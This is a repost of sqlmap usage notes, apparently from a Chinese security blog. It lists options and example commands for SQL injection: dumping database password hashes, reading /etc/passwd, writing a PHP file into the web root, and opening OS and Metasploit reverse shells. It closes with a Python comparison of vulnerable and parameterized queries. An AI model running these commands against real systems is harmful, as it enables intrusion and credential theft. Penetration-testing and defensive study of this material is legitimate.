sqlmap usage notes

Source: Internet
Author: User

Favorite: http://www.91ri.org/3364.html

Source: 91Ri

Note: the earlier version of these notes had an error. The `--` in the text is displayed as `-` (this is not because I do not want to fix it, but a problem with the site's system; sorry, please copy the commands and correct them by hand). :)

-u # injection point (target URL)
-f # fingerprint the database type
-b # get the database version information (banner)
-p # specify the parameter(s) to test (?page=1&id=2 -p "page,id")
-D "" # specify the database name
-T "" # specify the table name
-C "" # specify the column(s)
-s "" # save the injection session to a file; the run can be interrupted and resumed next time (save: -s "xx.log", resume: -s "xx.log" --resume)
--columns # list columns
--current-user # get the current user name
--current-db # get the current database name
--users # list all database users
--passwords # list the passwords (hashes) of all database users
--privileges # view user privileges (--privileges -U root)
-U # specify the database user
--dbs # list all databases
--tables -D "" # list the tables in the specified database
--columns -T "user" -D "mysql" # list all columns of the user table in the mysql database
--dump-all # dump all tables of all databases
--exclude-sysdbs # only list databases and tables created by the user (skip system databases)
--dump -T "" -D "" -C "" # dump the data of the given columns of a table in the specified database (--dump -T users -D master -C surname)
--dump -T "" -D "" --start 2 --stop 4 # dump entries 2 to 4 of the table in the specified database
--dbms # specify the DBMS (mysql, oracle, postgresql, microsoft sql server, microsoft access, sqlite, firebird, sybase, sap maxdb)
--os # specify the operating system (linux, windows)
-v # verbosity level (0-6)
0: Only Python tracebacks, errors and critical messages are displayed.
1: Displays information and warning messages.
2: Displays debug messages.
3: Displays the injected payloads.
4: Displays the HTTP requests.
5: Displays the HTTP response headers.
6: Displays the contents of the HTTP response page.
--privileges # view privileges
--is-dba # whether the current user is a database administrator
--roles # enumerate database user roles
--udf-inject # inject user-defined functions (to obtain system privileges)
--union-check # check whether UNION injection is supported
--union-cols # columns used for the UNION query
--union-test # test the UNION statement
--union-use # use UNION injection
--union-tech # UNION combined with ORDER BY
--method "POST" --data "" # submit data via POST (--method "POST" --data "page=1&id=2")
--cookie "separate with ;" # cookie injection (--cookie="PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low")
--referer "" # spoof the referer (--referer "http://www.baidu.com")
--user-agent "" # custom user-agent
--proxy "http://127.0.0.1:8118" # inject through a proxy
--string "" # specify a keyword (string to match in the true-condition page)
--threads # use multiple threads (--threads 3)
--sql-shell # execute SQL commands interactively
--sql-query # execute the given SQL statement (--sql-query "SELECT password FROM mysql.user WHERE user='root' LIMIT 0,1")
--file-read # read the specified file
--file-write # write a local file to the target (--file-write /test/test.txt --file-dest /var/www/html/1.txt; writes the local test.txt to 1.txt on the target)
--file-dest # absolute path of the file to write on the target
--os-cmd=id # execute a system command
--os-shell # interactive system shell
--os-pwn # reverse shell (--os-pwn --msf-path=/opt/framework/msf3/)
--msf-path= # absolute path of Metasploit (--msf-path=/opt/framework/msf3/)
--os-smbrelay # one-click prompt for an out-of-band shell via SMB relay
--os-bof # stored procedure buffer overflow exploitation
--reg-read # read the Windows registry
--priv-esc # database process user privilege escalation
--time-sec= # delay setting; the default --time-sec=5 is 5 seconds
-p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)" # inject through the specified user-agent
--eta # blind injection
/pentest/database/sqlmap/txt/
common-columns.txt column dictionary
common-outputs.txt
common-tables.txt table dictionary
keywords.txt
oracle-default-passwords.txt
user-agents.txt
wordlist.txt
Common statements
1. ./sqlmap.py -u http://www.91ri.org/test.php?p=2 -f -b --current-user --current-db --users --passwords --dbs -v 0
2. ./sqlmap.py -u http://www.91ri.org/test.php?p=2 -b --passwords -U root --union-use -v 2
3. ./sqlmap.py -u http://www.91ri.org/test.php?p=2 -b --dump -T users -C username -D userdb --start 2 --stop 3 -v 2
4. ./sqlmap.py -u http://www.91ri.org/test.php?p=2 -b --dump -C "user,pass" -v 1 --exclude-sysdbs
5. ./sqlmap.py -u http://www.91ri.org/test.php?p=2 -b --sql-shell -v 2
6. ./sqlmap.py -u http://www.91ri.org/test.php?p=2 -b --file-read "C:\boot.ini" -v 2
7. ./sqlmap.py -u http://www.91ri.org/test.php?p=2 -b --file-write /test/test.txt --file-dest /var/www/html/1.txt -v 2
8. ./sqlmap.py -u http://www.91ri.org/test.php?p=2 -b --os-cmd "id" -v 1
9. ./sqlmap.py -u http://www.91ri.org/test.php?p=2 -b --os-shell --union-use -v 2
10. ./sqlmap.py -u http://www.91ri.org/test.php?p=2 -b --os-pwn --msf-path=/opt/framework/msf3 --priv-esc -v 1
11. ./sqlmap.py -u http://www.91ri.org/test.php?p=2 -b --os-pwn --msf-path=/opt/framework/msf3 -v 1
12. ./sqlmap.py -u http://www.91ri.org/test.php?p=2 -b --os-bof --msf-path=/opt/framework/msf3 -v 1
13. ./sqlmap.py -u http://www.91ri.org/test.php?p=2 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=test --reg-type=REG_SZ --reg-data=1
14. ./sqlmap.py -u http://www.91ri.org/test.php?p=2 -b --eta
15. ./sqlmap.py -u "http://www.91ri.org/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"
16. ./sqlmap.py -u "http://www.91ri.org/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass"
17. ./sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"
18. ./sqlmap.py -u "http://www.91ri.org/sqlmap/mysql/get_int.php?id=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3
19. ./sqlmap.py -u "http://www.91ri.org/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo'" -v 1
20. ./sqlmap.py -u "http://www.91ri.org/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner

A simple injection process
1. Read the database version, current user and current database
sqlmap -u http://www.91ri.org/test.php?p=2 -f -b --current-user --current-db -v 1
2. Determine the privileges of the current database user
sqlmap -u http://www.91ri.org/test.php?p=2 --privileges -U <username> -v 1
sqlmap -u http://www.91ri.org/test.php?p=2 --is-dba -U <username> -v 1
3. Read the passwords of all database users or of a specified database user
sqlmap -u http://www.91ri.org/test.php?p=2 --users --passwords -v 2
sqlmap -u http://www.91ri.org/test.php?p=2 --passwords -U root -v 2
4. Get all databases
sqlmap -u http://www.91ri.org/test.php?p=2 --dbs -v 2
5. Get all tables in the specified database
sqlmap -u http://www.91ri.org/test.php?p=2 --tables -D mysql -v 2
6. Get the columns of the specified table in the specified database
sqlmap -u http://www.91ri.org/test.php?p=2 --columns -D mysql -T users -v 2
7. Get the data of the specified columns of the specified table in the specified database
sqlmap -u http://www.91ri.org/test.php?p=2 --dump -D mysql -T users -C "username,password" -s "sqlnmapdb.log" -v 2
8. --file-read: read files from the web server
sqlmap -u http://www.91ri.org/test.php?p=2 --file-read "/etc/passwd" -v 2
9. --file-write: write files to the web server
sqlmap -u http://www.91ri.org/test.php?p=2 --file-write /localhost/mm.php --file-dest /var/www/html/xx.php -v 2
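Every step of the process above works only because the `p` parameter of `test.php` is pasted into a SQL statement. As an added example (not from the original notes, and not code from the site being tested), the snippet below puts the vulnerable lookup next to its hardened form against a constructed in-memory SQLite table: the first function concatenates the parameter into the query text, the second validates the type and binds it as a parameter so the value can never change the statement's structure. The table contents, function names and the `2 OR 1=1` probe are assumptions made for this example.

```python
import sqlite3

# Constructed in-memory table standing in for the "users" table the walkthrough dumps
# (hypothetical rows, not data from the original page).
SAMPLE_ROWS = [
    (1, "alice", "hash-of-alice-password"),
    (2, "bob", "hash-of-bob-password"),
]


def make_db() -> sqlite3.Connection:
    """Create the sample database used by the two lookup functions below."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, p: str):
    """The pattern the walkthrough exploits: the request parameter becomes part of the
    SQL text, so whatever the client sends is executed as SQL."""
    sql = f"SELECT username FROM users WHERE id = {p}"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, p: str):
    """Hardened form: validate the type first, then bind the value as a parameter.
    The DBMS receives statement and value separately; the value cannot alter the query."""
    try:
        user_id = int(p)
    except ValueError:
        return []  # anything that is not an integer id is rejected outright
    return conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for param in ("2", "2 OR 1=1"):
        print(repr(param), "vulnerable:", lookup_vulnerable(db, param),
              "safe:", lookup_safe(db, param))
```

With the literal `2` both functions return bob's row; with `2 OR 1=1` the vulnerable version returns every user while the hardened one returns nothing. Steps 8 and 9 (`--file-read`, `--file-write`) and the `--os-cmd`/`--os-shell` options additionally depend on the application's database account holding file or administrative privileges, so running the web application under a least-privilege database user limits what an injection can reach even before the query is fixed.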

This article is transferred from BUGCX Blog by the network Security and Defense Research Laboratory (www.91ri.org) Information security team to collect and collate.
